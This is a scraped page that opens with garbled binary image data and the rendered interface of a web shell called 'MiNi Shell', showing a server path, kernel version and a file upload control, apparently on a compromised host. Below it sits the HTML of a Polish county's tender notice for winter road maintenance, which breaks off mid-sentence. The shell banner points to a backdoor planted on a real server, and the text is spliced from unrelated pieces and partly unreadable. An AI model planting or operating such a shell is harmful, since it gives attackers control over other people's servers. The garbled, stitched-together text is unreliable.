JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20240926/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20240926/0051791701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zimowe utrzymanie dróg powiatowych w sezonie zimowym 2024-2025 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowy Zarząd Dróg w Choszcznie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 811782182</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bolesława Chrobrego 27a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Choszczno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">73-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL427 - Szczecinecko-pyrzycki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">95 7657975</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pzdst@powiatchoszczno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bippzd.powiatchoszczenski.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> zarządca dróg powiatowych </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zimowe utrzymanie dróg powiatowych w sezonie zimowym 2024-2025 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-25d773ba-9a3d-492c-8427-c16743f74ed3</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00517917</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-09-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00011439/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Zimowe utrzymanie dróg powiatowych w sezonie zimowym 2024-2025</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pzdchoszczno.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W przedmiotowym postępowaniu Zamawiający dopuszcza możliwość przekazywania sobie przez strony postępowania oświadczeń, wniosków, zawiadomień oraz informacji: Elektronicznie za pośrednictwem Platformy<br/>znajdującej się pod adresem: https://pzdchoszczno.ezamawiajacy.pl w zakładce „Korespondencja”. Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie PZD; https://pzdchoszczno.ezamawiajacy.pl, lub<br/>https://oneplace.marketplanet.pl.<br/>Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy Zakupowej.<br/>W przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma zakupowa PZD tel. +48 22 257 22 23 (infolinia dostępna w dni robocze, w godzinach 9.00-17.00) e-mail: oneplace@marketplanet.pl. Rozdział 11 SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Zamawiający określa niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie Zakupowej, tj.:<br/>1) stały dostęp do sieci internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów<br/>operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>3) zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet<br/>Explorer minimalnie wersja 10.0;<br/>4) włączona obsługa JavaScript;<br/>5) zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>2. Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w txt, rtf, pdf ,xps, odt, ods,<br/>odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv,<br/>zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.<br/>3. Zamawiający określa informacje na temat kodowania i czasu odbioru danych tj.:<br/>1) Plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otwarcia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert.<br/>4. Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego<br/>serwera synchronizowanego odpowiednim źródłem czasu.<br/>5. Zamawiający określa dopuszczalny format podpisu elektronicznego, jako:<br/>1) dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PAdES,<br/>2) dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;, wtedy będzie wymagany oddzielny plik z podpisem. W związku z tym Wykonawca będzie zobowiązany załączyć, prócz podpisanego dokumentu, oddzielny plik z podpisem.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna z art. 13 RODO Zgodnie z art. 13 ust.1 i 2 rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016 r., str. 1), dalej „RODO”, informuję, że:<br/>Administratorem danych osobowych Wykonawcy jest:<br/>Dyrektor Powiatowego Zarządu Dróg w Choszcznie ul. Bolesława Chrobrego 27a, 73-200 Choszczno<br/>Inspektorem danych osobowych w Powiatowym Zarządzie Dróg w Choszcznie jest: Pan Zbigniew Barwina<br/>Adres e-mail: iod.choszczno@barwina.eu Telefon: 693 417 982<br/>Pełna informacja - Rozdział 24 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PZD.ST.271.6.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie Nr 1 – obręb gminy Bierzwnik, Zakres robót obejmuje w szczególności:<br/>- odśnieżanie dróg powiatowych;<br/>- posypywanie nawierzchni dróg mieszanką piasku z solą lub solą;<br/>- gotowość do świadczenia usług: usuwanie gołoledzi i odśnieżania;<br/>- odśnieżanie dróg przy pomocy pracy koparko-ładowarki lub ładowarki lub innym sprzętem pomocniczym. Szczegółowy<br/>zakres ww. usług ujęty jest w arkuszu cenowym dla każdego zadania.<br/>Szczegółowe wykazy kilometrów dróg poszczególnych zadań (części) wyszczególniono w załączniku nr 8 niniejszej SWZ -<br/>Specyfikacje Techniczne. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-11-01 do 2025-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane według następujących kryteriów (suma 100%):<br/>• Cena max. - brutto 60 %<br/>• Czas reakcji – 40%<br/>1. Opis kryterium „cena”:<br/>C = (Cmin / Co) x 60% przy czym 1% = 1 punkt<br/>Kryterium „cena” będzie rozpatrywane na podstawie ceny ofertowej brutto za wykonanie przedmiotu zamówienia, podanej przez<br/>Wykonawcę w formularzu oferty. W tym kryterium można uzyskać maksymalnie 60 punktów.<br/>Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku. Liczba punktów w kryterium „cena” (C) zostanie obliczona na<br/>podstawie następującego wzoru:<br/>C = Cmin /Co x 60 pkt<br/>gdzie : Cmin - najniższa cena brutto spośród nieodrzuconych ofert <br/>Co - cena brutto oferty ocenianej spośród nieodrzuconych ofert<br/>W ramach tego kryterium Zamawiający będzie oceniał zaproponowany przez Wykonawcę „czas reakcji”, czyli wyrażony w minutach<br/>maksymalny czas, jaki może upłynąć od chwili wydania dyspozycji przez Zamawiającego lub od chwili wystąpienia niekorzystnych zjawisk pogodowych do momentu przystąpienia do świadczenia usług wymienionych w rozdz. 4 pkt. 2 w trakcie zimowego utrzymania dróg. W kryterium tym można uzyskać maksymalnie 40 punktów i będzie oceniane następująco:<br/> czas reakcji do 30 minut – 40 pkt.<br/> czas reakcji od 31 minut do 60 minut – 30 pkt.<br/> czas reakcji od 61 minut do 90 minut – 20 pkt<br/> czas reakcji od 91 minut do 120 minut – 10 pkt<br/> czas reakcji powyżej 120 minut - 0 pkt.<br/>Przyjmuje się, że w ww. punktacji: 1 pkt = 1%.<br/>Wykonawca zobowiązany jest dysponować sprzętem niezbędnym do realizacji zamówienia, gotowym do użycia w ciągu<br/>maksymalnie 180 minut od chwili otrzymania dyspozycji od dyżurnego PZD o konieczności podjęcia akcji na drodze.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie Nr 2 – obręb gminy Choszczno<br/>Zakres robót obejmuje w szczególności:<br/>- odśnieżanie dróg powiatowych;<br/>- posypywanie nawierzchni dróg mieszanką piasku z solą lub solą;<br/>- gotowość do świadczenia usług: usuwanie gołoledzi i odśnieżania;<br/>- odśnieżanie dróg przy pomocy pracy koparko-ładowarki lub ładowarki lub innym sprzętem pomocniczym; Szczegółowy<br/>zakres ww. usług ujęty jest w arkuszu cenowym dla każdego zadania.<br/>Szczegółowe wykazy kilometrów dróg poszczególnych zadań (części) wyszczególniono w załączniku nr 8 niniejszej SWZ -<br/>Specyfikacje Techniczne. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-11-01 do 2025-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane według następujących kryteriów (suma 100%):<br/>• Cena max. - brutto 60 %<br/>• Czas reakcji – 40%<br/>1. Opis kryterium „cena”:<br/>C = (Cmin / Co) x 60% przy czym 1% = 1 punkt<br/>Kryterium „cena” będzie rozpatrywane na podstawie ceny ofertowej brutto za wykonanie przedmiotu zamówienia, podanej przez<br/>Wykonawcę w formularzu oferty. W tym kryterium można uzyskać maksymalnie 60 punktów.<br/>Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku. Liczba punktów w kryterium „cena” (C) zostanie obliczona na<br/>podstawie następującego wzoru:<br/>C = Cmin /Co x 60 pkt<br/>gdzie : Cmin - najniższa cena brutto spośród nieodrzuconych ofert <br/>Co - cena brutto oferty ocenianej spośród nieodrzuconych ofert<br/>W ramach tego kryterium Zamawiający będzie oceniał zaproponowany przez Wykonawcę „czas reakcji”, czyli wyrażony w minutach<br/>maksymalny czas, jaki może upłynąć od chwili wydania dyspozycji przez Zamawiającego lub od chwili wystąpienia niekorzystnych zjawisk pogodowych do momentu przystąpienia do świadczenia usług wymienionych w rozdz. 4 pkt. 2 w trakcie zimowego utrzymania dróg. W kryterium tym można uzyskać maksymalnie 40 punktów i będzie oceniane następująco:<br/> czas reakcji do 30 minut – 40 pkt.<br/> czas reakcji od 31 minut do 60 minut – 30 pkt.<br/> czas reakcji od 61 minut do 90 minut – 20 pkt<br/> czas reakcji od 91 minut do 120 minut – 10 pkt<br/> czas reakcji powyżej 120 minut - 0 pkt.<br/>Przyjmuje się, że w ww. punktacji: 1 pkt = 1%.<br/>Wykonawca zobowiązany jest dysponować sprzętem niezbędnym do realizacji zamówienia, gotowym do użycia w ciągu<br/>maksymalnie 180 minut od chwili otrzymania dyspozycji od dyżurnego PZD o konieczności podjęcia akcji na drodze.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 3 - obręb gminy Drawno<br/>Zakres robót obejmuje w szczególności:<br/>- odśnieżanie dróg powiatowych;<br/>- posypywanie nawierzchni dróg mieszanką piasku z solą lub solą;<br/>- gotowość do świadczenia usług: usuwanie gołoledzi i odśnieżania;<br/>- odśnieżanie dróg przy pomocy pracy koparko-ładowarki lub ładowarki lub innym sprzętem pomocniczym; Szczegółowy<br/>zakres ww. usług ujęty jest w arkuszu cenowym dla każdego zadania.<br/>Szczegółowe wykazy kilometrów dróg poszczególnych zadań (części) wyszczególniono w załączniku nr 8 niniejszej SWZ -<br/>Specyfikacje Techniczne </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-11-01 do 2025-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane według następujących kryteriów (suma 100%):<br/>• Cena max. - brutto 60 %<br/>• Czas reakcji – 40%<br/>1. Opis kryterium „cena”:<br/>C = (Cmin / Co) x 60% przy czym 1% = 1 punkt<br/>Kryterium „cena” będzie rozpatrywane na podstawie ceny ofertowej brutto za wykonanie przedmiotu zamówienia, podanej przez<br/>Wykonawcę w formularzu oferty. W tym kryterium można uzyskać maksymalnie 60 punktów.<br/>Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku. Liczba punktów w kryterium „cena” (C) zostanie obliczona na<br/>podstawie następującego wzoru:<br/>C = Cmin /Co x 60 pkt<br/>gdzie : Cmin - najniższa cena brutto spośród nieodrzuconych ofert <br/>Co - cena brutto oferty ocenianej spośród nieodrzuconych ofert<br/>W ramach tego kryterium Zamawiający będzie oceniał zaproponowany przez Wykonawcę „czas reakcji”, czyli wyrażony w minutach<br/>maksymalny czas, jaki może upłynąć od chwili wydania dyspozycji przez Zamawiającego lub od chwili wystąpienia niekorzystnych zjawisk pogodowych do momentu przystąpienia do świadczenia usług wymienionych w rozdz. 4 pkt. 2 w trakcie zimowego utrzymania dróg. W kryterium tym można uzyskać maksymalnie 40 punktów i będzie oceniane następująco:<br/> czas reakcji do 30 minut – 40 pkt.<br/> czas reakcji od 31 minut do 60 minut – 30 pkt.<br/> czas reakcji od 61 minut do 90 minut – 20 pkt<br/> czas reakcji od 91 minut do 120 minut – 10 pkt<br/> czas reakcji powyżej 120 minut - 0 pkt.<br/>Przyjmuje się, że w ww. punktacji: 1 pkt = 1%.<br/>Wykonawca zobowiązany jest dysponować sprzętem niezbędnym do realizacji zamówienia, gotowym do użycia w ciągu<br/>maksymalnie 180 minut od chwili otrzymania dyspozycji od dyżurnego PZD o konieczności podjęcia akcji na drodze.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek 